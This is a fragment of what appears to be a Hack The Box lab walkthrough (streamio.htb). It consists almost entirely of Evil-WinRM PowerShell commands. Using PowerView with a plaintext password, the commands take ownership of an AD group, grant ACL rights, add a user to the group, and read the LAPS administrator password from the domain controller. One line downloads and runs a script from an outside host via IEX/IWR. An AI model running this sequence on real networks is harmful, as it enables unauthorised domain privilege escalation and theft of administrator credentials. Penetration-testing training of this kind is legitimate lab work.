*Evil-WinRM* PS C:\Users\nikk37\Documents> PowerView.ps1
*Evil-WinRM* PS C:\Users\nikk37\Documents> $pwd = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37\Documents> $cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDGodd', $pwd)
*Evil-WinRM* PS C:\Users\nikk37\Documents> Set-DomainObjectOwner -Identity 'Core Staff' -OwnerIdentity JDGodd -Cred $cred
*Evil-WinRM* PS C:\Users\nikk37\Documents> Add-DomainObjectAcl -TargetIdentity 'Core Staff' -PrincipalIdentity JDGodd -Cred $cred
*Evil-WinRM* PS C:\Users\nikk37\Documents> Add-DomainGroupMember -Identity 'Core Staff' -Members Nikk37 -cred $cred
LAPS manages the administrator account, so the password stored in `ms-mcs-AdmPwd` is always the administrator's.
*Evil-WinRM* PS C:\Users\nikk37\Documents> IEX(IWR http://10.10.14.6/PowerView.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\Users\nikk37\Documents> Get-DomainObject DC -Properties "ms-mcs-AdmPwd",name